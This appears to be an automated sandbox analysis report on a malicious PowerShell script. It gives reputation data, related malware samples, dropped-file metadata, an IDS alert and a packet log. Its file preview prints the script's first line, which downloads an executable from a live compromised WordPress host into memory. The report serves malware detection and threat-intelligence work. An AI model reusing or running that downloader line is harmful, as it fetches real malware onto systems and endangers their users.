                                        http://italialife24.itpowershell.exe, 00000000.00000002.1496224082.000001F9CEE5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.italialife24.itpowershell.exe, 00000000.00000002.1496224082.000001F9CEE5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        46.254.34.201
                                        italialife24.itItaly
                                        52030SERVERPLAN-ASITtrue
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1567193
                                        Start date and time:2024-12-03 09:16:07 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 4m 37s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:11
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:untrippingvT.ps1
                                        Detection:MAL
                                        Classification:mal72.evad.winPS1@3/9@1/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 1
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .ps1
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                        • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: untrippingvT.ps1
                                        TimeTypeDescription
                                        03:16:58API Interceptor31x Sleep call for process: powershell.exe modified
                                        03:17:13API Interceptor1x Sleep call for process: WerFault.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        46.254.34.201http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                        • bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        s-part-0035.t-0009.t-msedge.net1L8qjfD9J2.exeGet hashmaliciousNjratBrowse
                                        • 13.107.246.63
                                        INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 13.107.246.63
                                        PI-02911202409#.xlaGet hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 13.107.246.63
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        SERVERPLAN-ASITyT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                        • 193.70.147.14
                                        Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                        • 185.81.4.143
                                        Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                        • 93.95.216.8
                                        Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                        • 93.95.216.8
                                        citibank_0824_statement.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        https://www.bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousKoiLoaderBrowse
                                        • 46.254.34.201
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eyT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                        • 46.254.34.201
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 46.254.34.201
                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 46.254.34.201
                                        https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                        • 46.254.34.201
                                        http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                        • 46.254.34.201
                                        No context
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.591482052867914
                                        Encrypted:false
                                        SSDEEP:192:eph4mGZv0kigMyjalUb1FAiGlJazuiFfZ24lO8b:evHGZckigHjl1FrQJazuiFfY4lO8b
                                        MD5:C814A1F13719A73542FFF9BA0A8DBEE7
                                        SHA1:9279523FCB026CDB8E2BFBB30D85CEA4BCD7FBCD
                                        SHA-256:589EC3A88D079DCAFB8C64379AD709EE695F917E6211D5F86A087603C3D9F28B
                                        SHA-512:A6086634796E384FF66CE0544B4E8C0D5F4A26057262949CE1321407F00827AF80BFFE6A6F1848007C89D896C5C08FE2380E5487A6D19010F00B6DAD785FBD10
                                        Malicious:false
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.6.8.7.4.2.3.2.4.6.4.2.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.6.8.7.4.2.5.4.4.9.5.6.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.e.a.f.f.d.2.-.f.8.8.7.-.4.0.1.7.-.9.2.1.9.-.f.c.6.a.7.3.4.8.1.8.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.3.5.1.9.0.7.-.3.d.4.8.-.4.0.4.b.-.b.8.7.a.-.7.e.2.4.1.7.6.f.c.4.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.0.-.0.0.0.1.-.0.0.1.4.-.5.7.4.c.-.d.8.b.7.5.b.4.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8816
                                        Entropy (8bit):3.7048669246410406
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJdzp5ao6YcD6i++gmfMK4bPpDO89btmsfJPm:R6lXJpp5V6YNi++gmfMKOt1f8
                                        MD5:E8F17607D43E00DA4FDE5219DD10E2E0
                                        SHA1:414284535E960890266195369E204B3897D9D9CA
                                        SHA-256:B1F42951B9439939FFBDD6DA4E63E460C7A94CC040CB5F4988F2454E55E1D0FF
                                        SHA-512:23D7678A165838E03B9CD134CEE2752EB6D55D42EFD6E55141796BFAB68668E28F3F43EEAFCCFB64478B5E3B6E58743D90CD33A750636DD735F944F27578DA26
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.8.<./.P.i.
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4764
                                        Entropy (8bit):4.488588940548102
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsZ7ZJg771I94rWpW8VY7Ym8M4JQ9pOKFn0yq85IuO1JoHg5ytfjd:uIjftI7Ha7VDJQnIkHHg5ufjd
                                        MD5:164EFA0E86431251B708628403E70E31
                                        SHA1:9892A537E75D765AB7D518FA422E980E0004F98B
                                        SHA-256:1C797196EA94339B0CADD1F34C713D79BD17C5BF2313EF96734A61880891E338
                                        SHA-512:F6D7A2858582B4D9BBE0FC80FE34BBA5D661A27D2E40B7BFA3B75AAABDDF36D77C09DDEDF1244BFE60C2337EF01846D38C333FE243AAEEF5BF29CDD811BC9F26
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="614839" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 16 streams, Tue Dec 3 08:17:04 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):873516
                                        Entropy (8bit):3.09965414026746
                                        Encrypted:false
                                        SSDEEP:6144:Ypp2JQenqSDO6Hc9lnYATpifq3dLlUQqPd3gS6g3Qo1AcMFS:YWJ0KO6HinYATpZ3dSQqPlgS60Qoi
                                        MD5:129E54436A16A6C74E8C1885649A0E22
                                        SHA1:0E987D29E885A688D4B0119F011A02F943E7EC08
                                        SHA-256:5393104487D757F2D6357B0B91D22C07D56EE30233836D582C0152C9043E2D7E
                                        SHA-512:862EFD2ED5E64E00B48652DD6E963C71E0AFF9980A0A5FD4B1F131F88831166B0D54CF19E855A355CE13C0C7221ACEFCCA5B88AB2567113F7B4AD36A4DC92874
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... .........Ng........................./..4.......$....;...........<......T...............l.......8...........T........... w...............T...........V..............................................................................eJ......\W......Lw......................T...........x.Ng.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6220
                                        Entropy (8bit):3.7244043855634037
                                        Encrypted:false
                                        SSDEEP:48:RhqqATcCIU2bHXHwwukvhkvklCywnXbB/lUWOSogZon3bB/laOSogZoL1:eVTcCBQXgkvhkvCCtXbB/FH0bB/yHQ
                                        MD5:F8D4CF5DE421307CE95347EF3A796095
                                        SHA1:A41ECA4086C6006A99884AC01FAD15A5218F8120
                                        SHA-256:E67F38673E930B44F7D9A0CCD52EEE7C48CB0D14522C370A630C8CA4EA94D1A9
                                        SHA-512:4CAAB153F6434730A91517BC378F4D9F759B8B1E65B3253E6A0D01FF5D2834BA5E41F83FC67BF6EAE0D53A695946AAB4574259761ABFDD6D0BB8D34015A4F4EE
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ....'GDj...S3.[E..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....<.[E......[E......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.B..........................=...A.p.p.D.a.t.a...B.V.1......Y.B..Roaming.@......EWsG.Y.B...........................!..R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.B..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.B...........................b.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.B....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.B....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.B................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6220
                                        Entropy (8bit):3.7244043855634037
                                        Encrypted:false
                                        SSDEEP:48:RhqqATcCIU2bHXHwwukvhkvklCywnXbB/lUWOSogZon3bB/laOSogZoL1:eVTcCBQXgkvhkvCCtXbB/FH0bB/yHQ
                                        MD5:F8D4CF5DE421307CE95347EF3A796095
                                        SHA1:A41ECA4086C6006A99884AC01FAD15A5218F8120
                                        SHA-256:E67F38673E930B44F7D9A0CCD52EEE7C48CB0D14522C370A630C8CA4EA94D1A9
                                        SHA-512:4CAAB153F6434730A91517BC378F4D9F759B8B1E65B3253E6A0D01FF5D2834BA5E41F83FC67BF6EAE0D53A695946AAB4574259761ABFDD6D0BB8D34015A4F4EE
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ....'GDj...S3.[E..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....<.[E......[E......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.B..........................=...A.p.p.D.a.t.a...B.V.1......Y.B..Roaming.@......EWsG.Y.B...........................!..R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.B..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.B...........................b.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.B....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.B....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.B................
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.394815723749597
                                        Encrypted:false
                                        SSDEEP:6144:Gl4fiJoH0ncNXiUjt10qCG/gaocYGBoaUMMhA2NX4WABlBuNAbOBSqa:G4vFCMYQUMM6VFYSbU
                                        MD5:229A8E6D523A025556D8CFDF319B7F92
                                        SHA1:BBE6D83F79574547978A0421F22F6D01A4F72A9A
                                        SHA-256:E74450288E22E8A350F0937FEBA6509713F74BFDB26D64CBDD9CBA22E2365EC8
                                        SHA-512:F5FBA5C282EBDFC55F35D7CF4B5A2419C73B0D23F7D5B98C4616EAE883C1665CD390F3D8545FC1A65DB43B5B0674DC17D196775E0580DC316352EFE3F3AA583E
                                        Malicious:false
                                        Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[E..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:ASCII text, with very long lines (4140), with CRLF line terminators
                                        Entropy (8bit):4.883568778617603
                                        TrID:
                                        • Generic INI configuration (1001/1) 100.00%
                                        File name:untrippingvT.ps1
                                        File size:7'373 bytes
                                        MD5:e526026cb74a39fc4b0a27aae4f49bd7
                                        SHA1:b368b77e815996a1fbe4e2917fec0d833bc27d79
                                        SHA256:8f63ece1f34da011c8aaddba57b7955e681df41750b17eafaa35d9765d1e0be9
                                        SHA512:214d21c4f01542f49c5df3ec84365c8902818feb7c254972b83497738a53dc06677e204ecd913264e7f29d6324a572becfd95c19291b7898f40379c984ea392c
                                        SSDEEP:192:OvOuLf6+qUClbRZqwiJY5AH+W4BJeGZjf6H1XTMTqTb:OvQ+yo+yh
                                        TLSH:CCE179E5BE1C45E419BB225CDF928882AD4DA67415F88505F6BE8C0BF79FE2480F0B0D
                                        File Content Preview:[Byte[]]$image = (IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/hypervitalizationVA.exe').Content;....function GDT..{.. Param.. (.. [OutputType([Type])].. .. [Parameter( Position = 0)]..
                                        Icon Hash:3270d6baae77db44
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-03T09:17:02.324744+01002021697ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious1192.168.2.94971246.254.34.201443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 3, 2024 09:17:00.029290915 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:00.029339075 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:00.029413939 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:00.042210102 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:00.042227030 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:01.568325043 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:01.568435907 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:01.803447008 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:01.803488016 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:01.803855896 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:01.852444887 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:01.869767904 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:01.915324926 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.324781895 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.324816942 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.324826002 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.324896097 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.324937105 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.368000984 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.430826902 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.430843115 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.430910110 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.541280985 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.541295052 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.541363001 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.570760965 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.570775032 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.570956945 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.596178055 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.596191883 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.596256018 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.647221088 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.647233009 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.647290945 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.740544081 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.740560055 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.740627050 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.756159067 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.756236076 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.776732922 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.776810884 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.788234949 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.788309097 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.798557997 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.798645973 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.807590961 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.807671070 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.819516897 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.819596052 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.865797997 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.865880966 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.951061964 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.951138020 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.959861994 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.959943056 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.969830990 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.969933033 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.978447914 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.978518009 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.986095905 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.986151934 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.993787050 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.993849039 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:02.999252081 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:02.999321938 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:03.008378983 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:03.008445024 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:03.015141010 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:03.015201092 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:03.021930933 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:03.022001982 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:03.024554968 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:03.024600029 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:03.024619102 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:03.024633884 CET4434971246.254.34.201192.168.2.9
                                        Dec 3, 2024 09:17:03.024684906 CET49712443192.168.2.946.254.34.201
                                        Dec 3, 2024 09:17:03.068694115 CET49712443192.168.2.946.254.34.201
                                        TimestampSource PortDest PortSource IPDest IP
